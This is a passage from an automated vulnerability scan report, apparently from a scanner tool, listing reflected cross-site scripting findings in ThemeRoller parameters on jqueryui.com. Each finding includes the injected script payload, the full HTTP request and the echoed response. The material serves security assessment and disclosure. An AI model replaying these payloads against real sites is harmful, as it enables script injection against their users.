fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e64055f"><script>alert(1)</script>0399770b2a2&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

3.48. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17242"><script>alert(1)</script>bafb8efe2b6 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec17242"><script>alert(1)</script>bafb8efe2b6&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
2121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec17242"><script>alert(1)</script>bafb8efe2b6&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

3.49. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10edc"><script>alert(1)</script>d067a1b35af was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc10edc"><script>alert(1)</script>d067a1b35af&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc10edc"><script>alert(1)</script>d067a1b35af&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

3.50. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84d7e"><script>alert(1)</script>7a510e251a9 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
9999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&b
...[SNIP]...

3.51. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8c7"><script>alert(1)</script>04593ff0f74 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada1e8c7"><script>alert(1)</script>04593ff0f74&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada1e8c7"><script>alert(1)</script>04593ff0f74&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

3.52. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8aec"><script>alert(1)</script>bd9d43878e2 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaad8aec"><script>alert(1)</script>bd9d43878e2&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaad8aec"><script>alert(1)</script>bd9d43878e2&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

3.53. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97187"><script>alert(1)</script>2b2f49b085a was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa97187"><script>alert(1)</script>2b2f49b085a&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa97187"><script>alert(1)</script>2b2f49b085a&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.54. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49013"><script>alert(1)</script>e719f071a57 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6549013"><script>alert(1)</script>e719f071a57&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6549013"><script>alert(1)</script>e719f071a57&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

3.55. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2b8e"><script>alert(1)</script>4893dfa1069 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75f2b8e"><script>alert(1)</script>4893dfa1069&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75f2b8e"><script>alert(1)</script>4893dfa1069&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

3.56. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f27d"><script>alert(1)</script>ef2045cfdcc was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753f27d"><script>alert(1)</script>ef2045cfdcc&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753f27d"><script>alert(1)</script>ef2045cfdcc&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

3.57. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10d83"><script>alert(1)</script>440d9262b96 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

